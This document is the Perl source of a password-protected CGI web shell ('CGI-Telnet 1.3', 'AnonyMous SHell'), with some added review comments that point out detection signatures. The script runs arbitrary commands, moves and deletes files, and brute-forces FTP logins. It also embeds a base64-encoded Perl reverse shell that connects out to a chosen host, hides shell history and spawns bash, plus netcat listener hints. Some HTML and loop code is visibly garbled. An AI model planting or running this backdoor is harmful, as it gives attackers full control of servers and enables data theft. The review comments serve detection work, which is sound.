#!/usr/bin/perl -I/usr/local/bandmin
# Configuration globals and OS detection for a password-gated CGI script whose
# later sections run shell commands, transfer files and open sockets on the
# hosting server.
# NOTE(review): the literal strings assigned below ($Version, $EditPersion,
# $Password) and the -I path in the shebang are static content, so they are
# usable as file-scanning signatures when hunting for copies in a web root.
use MIME::Base64;    # decode_base64 is called later, in BackBind
$Version= "CGI-Telnet Version 1.3";
$EditPersion="AnonyMous";
# Shared secret for the login form. Later code compares it with `eq` against
# the submitted value and against the SAVEDPWD cookie, and writes the
# submitted value into that cookie unencoded.
$Password = "anonymous";		# Change this. You will need to enter this to login.

# Returns 1 when the SERVER_SOFTWARE banner contains "win" (case-insensitive
# substring match), otherwise 0. The banner is passed through trim() first.
sub Is_Win(){
    $os = &trim($ENV{"SERVER_SOFTWARE"});
    if($os =~ m/win/i){
        return 1;
    }
    else{
        return 0;
    }
}
# Set from Is_Win() at start-up. The original note said to set this to 1 by
# hand on Windows NT; that instruction appears to predate the auto-detection.
$WinNT = &Is_Win();
$NTCmdSep = "&";			# This character is used to separate 2 commands
					# in a command line on Windows NT.

$UnixCmdSep = ";";			# This character is used to separate 2 commands
					# in a command line on Unix.

# Passed to alarm() in RunCmd, so the unit is seconds; the value here is
# 10000 s. The original comment warns against large values.
$CommandTimeoutDuration = 10000;	# Time in seconds after commands will be killed
					# Don't set this to a very large value. This is
					# useful for commands that may hang or that
					# take very long to execute, like "find /".
					# This is valid only on Unix servers. It is
					# ignored on NT Servers.

$ShowDynamicOutput = 1;			# If this is 1, then data is sent to the
					# browser as soon as it is output, otherwise
					# it is buffered and sent when the command
					# completes. This is useful for commands like
					# ping, so that you can see the output as it
					# is being generated.

# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!

# Platform-dependent pieces that later code concatenates into shell command
# strings: the command separator, the "print working directory" command, the
# path separator, and the redirection suffix appended in RunCmd.
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
# Presumably the dimensions of the HTML text areas; the markup that used them
# was not preserved on this page. $rows is reassigned in SaveFileForm.
$cols= 150;
$rows= 26;
#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------ sub ReadParse { local (*in) = @_ if @_; local ($i, $loc, $key, $val); $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/; if($ENV{'REQUEST_METHOD'} eq "GET") { $in = $ENV{'QUERY_STRING'}; } elsif($ENV{'REQUEST_METHOD'} eq "POST") { binmode(STDIN) if $MultipartFormData & $WinNT; read(STDIN, $in, $ENV{'CONTENT_LENGTH'}); } # handle file upload data if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/) { $Boundary = '--'.$1; # please refer to RFC1867 @list = split(/$Boundary/, $in); $HeaderBody = $list[1]; $HeaderBody =~ /\r\n\r\n|\n\n/; $Header = $`; $Body = $'; $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape $in{'filedata'} = $Body; $Header =~ /filename=\"(.+)\"/; $in{'f'} = $1; $in{'f'} =~ s/\"//g; $in{'f'} =~ s/\s//g; # parse trailer for($i=2; $list[$i]; $i++) { $list[$i] =~ s/^.+name=$//; $list[$i] =~ /\"(\w+)\"/; $key = $1; $val = $'; $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g; $val =~ s/%(..)/pack("c", hex($1))/ge; $in{$key} = $val; } } else # standard post data (url encoded, not multipart) { @in = split(/&/, $in); foreach $i (0 .. $#in) { $in[$i] =~ s/\+/ /g; ($key, $val) = split(/=/, $in[$i], 2); $key =~ s/%(..)/pack("c", hex($1))/ge; $val =~ s/%(..)/pack("c", hex($1))/ge; $in{$key} .= "\0" if (defined($in{$key})); $in{$key} .= $val; } } } #------------------------------------------------------------------------------ # Prints the HTML Page Header # Argument 1: Form item name to which focus should be set #------------------------------------------------------------------------------ sub PrintPageHeader { $EncodedCurrentDir = $CurrentDir; $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; my $dir =$CurrentDir; $dir=~ s/\\/\\\\/g; print "Content-type: text/html\n\n"; print < AnonyMous SHell $HtmlMetaHeader
$EditPersion $ENV{"SERVER_SOFTWARE"} Server IP: $ENV{'SERVER_ADDR'} | Your IP: $ENV{'REMOTE_ADDR'}
Home | Command | GUI | Upload File | Download File | Back & Bind | Brute Forcer | Check Log | Domains/Users | Logout | Help
END } #------------------------------------------------------------------------------ # Prints the Login Screen #------------------------------------------------------------------------------ sub PrintLoginScreen { print < AnonyMous SHell

Password : anonymous

Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
~\$ Connected !
$ServerName~ Checking Server . . . . . . . . . . . . . . . . . . .
$ServerName~ Trying connect to Command . . . . . . . . . . .
$ServerName~\$ Connected Command!
$ServerName~\$ OK! You can kill it!


END } #------------------------------------------------------------------------------ # Add html special chars #------------------------------------------------------------------------------ sub HtmlSpecialChars($){ my $text = shift; $text =~ s/&/&/g; $text =~ s/"/"/g; $text =~ s/'/'/g; $text =~ s//>/g; return $text; } #------------------------------------------------------------------------------ # Add link for directory #------------------------------------------------------------------------------ sub AddLinkDir($) { my $ac=shift; my @dir=(); if($WinNT) { @dir=split(/\\/,$CurrentDir); }else { @dir=split("/",&trim($CurrentDir)); } my $path=""; my $result=""; foreach (@dir) { $path .= $_.$PathSep; $result.="".$_.$PathSep.""; } return $result; } #------------------------------------------------------------------------------ # Prints the message that informs the user of a failed login #------------------------------------------------------------------------------ sub PrintLoginFailedMessage { print <Login : Administrator
Password:
Login incorrect

END } #------------------------------------------------------------------------------ # Prints the HTML form for logging in #------------------------------------------------------------------------------ sub PrintLoginForm { print < Login : Administrator
Password: END } #------------------------------------------------------------------------------ # Prints the footer for the HTML Page #------------------------------------------------------------------------------ sub PrintPageFooter { print "
"; } #------------------------------------------------------------------------------ # Retreives the values of all cookies. The cookies can be accesses using the # variable $Cookies{'} #------------------------------------------------------------------------------ sub GetCookies { @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'}); foreach $cookie(@httpcookies) { ($id, $val) = split(/=/, $cookie); $Cookies{$id} = $val; } } #------------------------------------------------------------------------------ # Prints the screen when the user logs out #------------------------------------------------------------------------------ sub PrintLogoutScreen { print "Connection closed by foreign host.

"; } #------------------------------------------------------------------------------ # Logs out the user and allows the user to login again #------------------------------------------------------------------------------ sub PerformLogout { print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie &PrintPageHeader("p"); &PrintLogoutScreen; &PrintLoginScreen; &PrintLoginForm; &PrintPageFooter; exit; } #------------------------------------------------------------------------------ # This function is called to login the user. If the password matches, it # displays a page that allows the user to run commands. If the password doens't # match or if no password is entered, it displays a form that allows the user # to login #------------------------------------------------------------------------------ sub PerformLogin { if($LoginPassword eq $Password) # password matched { print "Set-Cookie: SAVEDPWD=$LoginPassword;\n"; &PrintPageHeader; print &ListDir; } else # password didn't match { &PrintPageHeader("p"); &PrintLoginScreen; if($LoginPassword ne "") # some password was entered { &PrintLoginFailedMessage; } &PrintLoginForm; &PrintPageFooter; exit; } } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to enter commands #------------------------------------------------------------------------------ sub PrintCommandLineInputForm { my $dir= "".&AddLinkDir("command").""; $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return < $Prompt END } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to download files #------------------------------------------------------------------------------ sub PrintFileDownloadForm { my $dir = &AddLinkDir("download"); $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return < $Prompt download

Filename:

Download: END } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to upload files #------------------------------------------------------------------------------ sub PrintFileUploadForm { my $dir= &AddLinkDir("upload"); $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return < $Prompt upload

Filename:

Options:  

Upload:    END } #------------------------------------------------------------------------------ # This function is called when the timeout for a command expires. We need to # terminate the script immediately. This function is valid only on Unix. It is # never called when the script is running on NT. #------------------------------------------------------------------------------ sub CommandTimeout { if(!$WinNT) { alarm(0); return <
Command exceeded maximum time of $CommandTimeoutDuration second(s).
Killed it! END } } #------------------------------------------------------------------------------ # This function displays the page that contains a link which allows the user # to download the specified file. The page also contains a auto-refresh # feature that starts the download automatically. # Argument 1: Fully qualified filename of the file to be downloaded #------------------------------------------------------------------------------ sub PrintDownloadLinkPage { local($FileUrl) = @_; my $result=""; if(-e $FileUrl) # if the file exists { # encode the file link so we can send it to the browser $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go"; $HtmlMetaHeader = ""; &PrintPageHeader("c"); $result .= < If the download does not start automatically, Click Here END $result .= &PrintCommandLineInputForm; } else # file doesn't exist { $result .= "Failed to download $FileUrl: $!"; $result .= &PrintFileDownloadForm; } return $result; } #------------------------------------------------------------------------------ # This function reads the specified file from the disk and sends it to the # browser, so that it can be downloaded by the user. # Argument 1: Fully qualified pathname of the file to be sent. 
#------------------------------------------------------------------------------
# Streams the file named by the first argument to the client as an attachment
# and ends the process; when the file cannot be opened it returns an HTML
# fragment (error text plus the download form) instead.
# NOTE(review): the path originates from request parameter "f" and the visible
# callers accept absolute paths, so nothing here limits which files readable
# by the web-server account can leave the host. For log hunting, a successful
# transfer is a CGI response with "Content-Type: application/x-unknown" and
# "Content-Disposition: attachment", requested with a=download and o=go in
# the query string (see PrintDownloadLinkPage).
sub SendFileToBrowser
{
    my $result = "";
    local($SendFile) = @_;
    if(open(SENDFILE, $SendFile)) # file opened for reading
    {
        if($WinNT)
        {
            binmode(SENDFILE);
            binmode(STDOUT);
        }
        $FileSize = (stat($SendFile))[7];    # element 7 of stat() is the size in bytes
        # The match leaves the trailing path component in $1; $Filename itself
        # is assigned but the header below uses $1.
        ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
        print "Content-Type: application/x-unknown\n";
        print "Content-Length: $FileSize\n";
        print "Content-Disposition: attachment; filename=$1\n\n";
        # NOTE(review): the read operand of this loop appears to have been
        # lost when the page was extracted; the statement is left as found.
        print while();
        close(SENDFILE);
        exit(1);    # exits with status 1 even though the transfer succeeded
    }
    else # failed to open file
    {
        $result .= "Failed to download $SendFile: $!";
        $result .=&PrintFileDownloadForm;
    }
    return $result;
}

#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
# NOTE(review): no call to BeginDownload is visible on this page; the
# "download" action dispatches to DownloadFile, which repeats the same path
# logic. The conditions below use the bitwise operators & and | on the
# match results rather than the logical forms.
#------------------------------------------------------------------------------
sub BeginDownload
{
    # get fully qualified path of the file to be downloaded
    if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
        (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
    {
        $TargetFile = $TransferFile;
    }
    else # path is relative
    {
        # copy $CurrentDir and drop one trailing slash or backslash, if any
        chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
        $TargetFile .= $PathSep.$TransferFile;
    }

    if($Options eq "go") # we have to send the file
    {
        &SendFileToBrowser($TargetFile);
    }
    else # we have to send only the link page
    {
        &PrintDownloadLinkPage($TargetFile);
    }
}

#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------ sub UploadFile { # if no file is specified, print the upload form again if($TransferFile eq "") { return &PrintFileUploadForm; } my $result=""; # start the uploading process $result .= "Uploading $TransferFile to $CurrentDir...
"; # get the fullly qualified pathname of the file to be created chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/; $TransferFile =~ m!([^/^\\]*)$!; $TargetName .= $PathSep.$1; $TargetFileSize = length($in{'filedata'}); # if the file exists and we are not supposed to overwrite it if(-e $TargetName && $Options ne "overwrite") { $result .= "Failed: Destination file already exists.
"; } else # file is not present { if(open(UPLOADFILE, ">$TargetName")) { binmode(UPLOADFILE) if $WinNT; print UPLOADFILE $in{'filedata'}; close(UPLOADFILE); $result .= "Transfered $TargetFileSize Bytes.
"; $result .= "File Path: $TargetName
"; } else { $result .= "Failed: $!
"; } } $result .= &PrintCommandLineInputForm; return $result; } #------------------------------------------------------------------------------ # This function is called when the user wants to download a file. If the # filename is not specified, it displays a form allowing the user to specify a # file, otherwise it displays a message to the user and provides a link # through which the file can be downloaded. #------------------------------------------------------------------------------ sub DownloadFile { # if no file is specified, print the download form again if($TransferFile eq "") { &PrintPageHeader("f"); return &PrintFileDownloadForm; } # get fully qualified path of the file to be downloaded if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute { $TargetFile = $TransferFile; } else # path is relative { chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; $TargetFile .= $PathSep.$TransferFile; } if($Options eq "go") # we have to send the file { return &SendFileToBrowser($TargetFile); } else # we have to send only the link page { return &PrintDownloadLinkPage($TargetFile); } } #------------------------------------------------------------------------------ # This function is called to execute commands. It displays the output of the # command and allows the user to enter another command. The change directory # command is handled differently. In this case, the new directory is stored in # an internal variable and is used each time a command has to be executed. The # output of the change directory command is not displayed to the users # therefore error messages cannot be displayed. #------------------------------------------------------------------------------ sub ExecuteCommand { my $result=""; if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command { # we change the directory internally. The output of the # command is not displayed. 
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd; chop($CurrentDir = `$Command`); $result .= &PrintCommandLineInputForm; $result .= "Command: $RunCommand
"; return $result; } #------------------------------------------------------------------------ # run command #------------------------------------------------------------------------ sub RunCmd { my $result=""; $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector; if(!$WinNT) { $SIG{'ALRM'} = \&CommandTimeout; alarm($CommandTimeoutDuration); } if($ShowDynamicOutput) # show output as it is generated { $|=1; $Command .= " |"; open(CommandOutput, $Command); while() { $_ =~ s/(\n|\r\n)$//; $result .= &HtmlSpecialChars("$_\n"); } $|=0; } else # show output after command completes { $result .= &HtmlSpecialChars('$Command'); } if(!$WinNT) { alarm(0); } return $result; } #============================================================================== # Form Save File #============================================================================== sub SaveFileForm { my $result =""; substr($RunCommand,0,5)=""; my $file=&trim($RunCommand); $save='
'; $File=$CurrentDir.$PathSep.$RunCommand; my $dir="".&AddLinkDir("gui").""; if(-w $File) { $rows="23" }else { $msg="
Permission denied!
"; $rows="20" } $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; $read=($WinNT)?"type":"less"; $RunCommand = "$read \"$RunCommand\""; $result .= < $Prompt
Command: $RunCommand $save
$msg
"; $result .= ""; return $result; } #============================================================================== # Save File #============================================================================== sub SaveFile($) { my $Data= shift ; my $File= shift; $File=$CurrentDir.$PathSep.$File; if(open(FILE, ">$File")) { binmode FILE; print FILE $Data; close FILE; return 1; }else { return 0; } } #------------------------------------------------------------------------------ # Brute Forcer Form #------------------------------------------------------------------------------ sub BruteForcerForm { my $result=""; $result .= < ####################################
Simple FTP brute forcer
####################################
User:
Pass:
Sleep:
END return $result; } #------------------------------------------------------------------------------ # Brute Forcer #------------------------------------------------------------------------------ sub BruteForcer { my $result=""; $Server=$ENV{'SERVER_ADDR'}; if($in{'user'} eq "") { $result .= &BruteForcerForm; }else { use Net::FTP; @user= split(/\n/, $in{'user'}); @pass= split(/\n/, $in{'pass'}); chomp(@user); chomp(@pass); $result .= "

[+] Trying brute $ServerName
====================>>>>>>>>>>>><<<<<<<<<<====================

\n"; foreach $username (@user) { if(!($username eq "")) { foreach $password (@pass) { $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n"; if($ftp->login("$username","$password")) { $result .= "[+] ftp://$username:$password\@$Server
\n"; $ftp->quit(); break; } if(!($in{'sleep'} eq "0")) { sleep(int($in{'sleep'})); } $ftp->quit(); } } } $result .= "\n
==========>>>>>>>>>> Finished <<<<<<<<<<==========
\n"; } return $result; } #------------------------------------------------------------------------------ # Backconnect Form #------------------------------------------------------------------------------ sub BackBindForm { return <
BackConnect: Host: Port:
[+] Client listen before connect back!
[+] Try check your Port with http://www.canyouseeme.org/
[+] Client listen with command: nc -vv -l -p 80


Bind Port: Port: Password:
[+] Chuc nang chua dc test!
[+] Try command: nc $ENV{'SERVER_ADDR'} 1412

END } #------------------------------------------------------------------------------ # Backconnect use perl #------------------------------------------------------------------------------ sub BackBind { use MIME::Base64; use Socket; $backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7"; $bindperl="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"; $ClientAddr = $in{'clientaddr'}; $ClientPort = int($in{'clientport'}); if($ClientPort eq 0) { return &BackBindForm; }elsif(!$ClientAddr eq "") { $Data=decode_base64($backperl); if(-w "/tmp/") { $File="/tmp/backconnect.pl"; }else { $File=$CurrentDir.$PathSep."backconnect.pl"; } open(FILE, ">$File"); print FILE $Data; close FILE; system("perl backconnect.pl $ClientAddr $ClientPort"); unlink($File); exit 0; }else { $Data=decode_base64($bindperl); if(-w "/tmp") { $File="/tmp/bindport.pl"; }else { $File=$CurrentDir.$PathSep."bindport.pl"; } open(FILE, ">$File"); print FILE $Data; close FILE; system("perl bindport.pl $ClientPort"); unlink($File); exit 0; } } #------------------------------------------------------------------------------ # Array List Directory 
#------------------------------------------------------------------------------ sub RmDir($) { my $dir = shift; if(opendir(DIR,$dir)) { while($file = readdir(DIR)) { if(($file ne ".") && ($file ne "..")) { $file= $dir.$PathSep.$file; if(-d $file) { &RmDir($file); } else { unlink($file); } } } closedir(DIR); } if(!rmdir($dir)) { } } sub FileOwner($) { my $file = shift; if(-e $file) { ($uid,$gid) = (stat($file))[4,5]; if($WinNT) { return "???"; } else { $name=getpwuid($uid); $group=getgrgid($gid); return $name."/".$group; } } return "???"; } sub ParentFolder($) { my $path = shift; my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd; chop($path = `$Comm`); return $path; } sub FilePerms($) { my $file = shift; my $ur = "-"; my $uw = "-"; if(-e $file) { if($WinNT) { if(-r $file){ $ur = "r"; } if(-w $file){ $uw = "w"; } return $ur . " / " . $uw; }else { $mode=(stat($file))[2]; $result = sprintf("%04o", $mode & 07777); return $result; } } return "0000"; } sub FileLastModified($) { my $file = shift; if(-e $file) { ($la) = (stat($file))[9]; ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1]; $y = $y + 1900; @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/; $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i); return $lmtime; } return "???"; } sub FileSize($) { my $file = shift; if(-f $file) { return -s $file; } return "0"; } sub ParseFileSize($) { my $size = shift; if($size <= 1024) { return $size. " B"; } else { if($size <= 1024*1024) { $size = sprintf("%.02f",$size / 1024); return $size." KB"; } else { $size = sprintf("%.2f",$size / 1024 / 1024); return $size." MB"; } } } sub trim($) { my $string = shift; $string =~ s/^\s+//; $string =~ s/\s+$//; return $string; } sub AddSlashes($) { my $string = shift; $string=~ s/\\/\\\\/g; return $string; } sub ListDir { my $path = $CurrentDir.$PathSep; $path=~ s/\\\\/\\/g; my $result = "
Path: [ ".&AddLinkDir("gui")." ]
"; if(-d $path) { my @fname = (); my @dname = (); if(opendir(DIR,$path)) { while($file = readdir(DIR)) { $f=$path.$file; if(-d $f) { push(@dname,$file); } else { push(@fname,$file); } } closedir(DIR); } @fname = sort { lc($a) cmp lc($b) } @fname; @dname = sort { lc($a) cmp lc($b) } @dname; $result .= "
"; my $style="line"; my $i=0; foreach my $d (@dname) { $style= ($style eq "line") ? "notline": "line"; $d = &trim($d); $dirname=$d; if($d eq "..") { $d = &ParentFolder($path); } elsif($d eq ".") { $d = $path; } else { $d = $path.$d; } $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $i++; } foreach my $f (@fname) { $style= ($style eq "line") ? "notline": "line"; $file=$f; $f = $path.$f; $view = "?dir=".$path."&view=".$f; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $i++; } $result .= "
File Name File Size Owner Permission Last Modified Action
[ ".$dirname." ]DIR".&FileOwner($d)."".&FilePerms($d)."".&FileLastModified($d)."Rename | Remove
".$file."".&ParseFileSize(&FileSize($f))."".&FileOwner($f)."".&FilePerms($f)."".&FileLastModified($f)."Edit | Rename | Download | Remove
"; } return $result; } #------------------------------------------------------------------------------ # Try to View List User #------------------------------------------------------------------------------ sub ViewDomainUser { open (domains, '/etc/named.conf') or $err=1; my @cnzs = ; close d0mains; my $style="line"; my $result="
Hoang Sa - Truong Sa
"; if ($err) { $result .= ('

C0uldn\'t Bypass it , Sorry

'); return $result; }else { $result .= ''; } foreach my $one (@cnzs) { if($one =~ m/.*?zone "(.*?)" {/) { $style= ($style eq "line") ? "notline": "line"; $filename= "/etc/valiases/".$one; $owner = getpwuid((stat($filename))[4]); $result .= ''; } } $result .= '
Domains User
'.$one.' '.$owner.'
'; return $result; } #------------------------------------------------------------------------------ # View Log #------------------------------------------------------------------------------ sub ViewLog { if($WinNT) { return "

Don't run on Windows

"; } my $result=""; my @pathlog=( '/usr/local/apache/logs/error_log', '/var/log/httpd/error_log', '/usr/local/apache/logs/access_log' ); my $i=0; my $perms; my $sl; foreach my $log (@pathlog) { if(-w $log) { $perms="OK"; }else { chop($sl = `ln -s $log error_log_$i`); if(&trim($ls) eq "") { if(-r $ls) { $perms="OK"; $log="error_log_".$i; } }else { $perms="Cancel"; } } $result .=<
END $i++; } $result .="
Path LogSubmit
$perms
"; return $result; } #------------------------------------------------------------------------------ # Main Program - Execution Starts Here #------------------------------------------------------------------------------ &ReadParse; &GetCookies; $ScriptLocation = $ENV{'SCRIPT_NAME'}; $ServerName = $ENV{'SERVER_NAME'}; $LoginPassword = $in{'p'}; $RunCommand = $in{'c'}; $TransferFile = $in{'f'}; $Options = $in{'o'}; $Action = $in{'a'}; $Action = "command" if($Action eq ""); # no action specified, use default # get the directory in which the commands will be executed $CurrentDir = &trim($in{'d'}); # mac dinh xuat thong tin neu ko co lenh nao! $RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq ""); chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq ""); $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password; if($Action eq "login" || !$LoggedIn) # user needs/has to login { &PerformLogin; }elsif($Action eq "gui") # GUI directory { &PrintPageHeader; if(!$WinNT) { $chmod=int($in{'chmod'}); if(!($chmod eq 0)) { $chmod=int($in{'chmod'}); $file=$CurrentDir.$PathSep.$TransferFile; chop($result= `chmod $chmod "$file"`); if(&trim($result) eq "") { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } } $rename=$in{'rename'}; if(!$rename eq "") { if(rename($TransferFile,$rename)) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } $remove=$in{'remove'}; if($remove ne "") { $rm = $CurrentDir.$PathSep.$remove; if(-d $rm) { &RmDir($rm); }else { if(unlink($rm)) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } } print &ListDir; } elsif($Action eq "command") # user wants to run a command { &PrintPageHeader("c"); print &ExecuteCommand; } elsif($Action eq "save") # user wants to save a file { &PrintPageHeader; if(&SaveFile($in{'data'},$in{'file'})) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } print &ListDir; } elsif($Action eq "upload") # user wants to upload a file { &PrintPageHeader; print &UploadFile; } elsif($Action eq "backbind") # user wants to back connect or bind port { &PrintPageHeader("clientport"); print &BackBind; } elsif($Action eq "bruteforcer") # user wants to brute force { &PrintPageHeader; print &BruteForcer; }elsif($Action eq "download") # user wants to download a file { print &DownloadFile; }elsif($Action eq "checklog") # user wants to view log file { &PrintPageHeader; print &ViewLog; }elsif($Action eq "domainsuser") # user wants to view list user/domain { &PrintPageHeader; print &ViewDomainUser; }elsif($Action eq "logout") # user wants to logout { &PerformLogout; } &PrintPageFooter;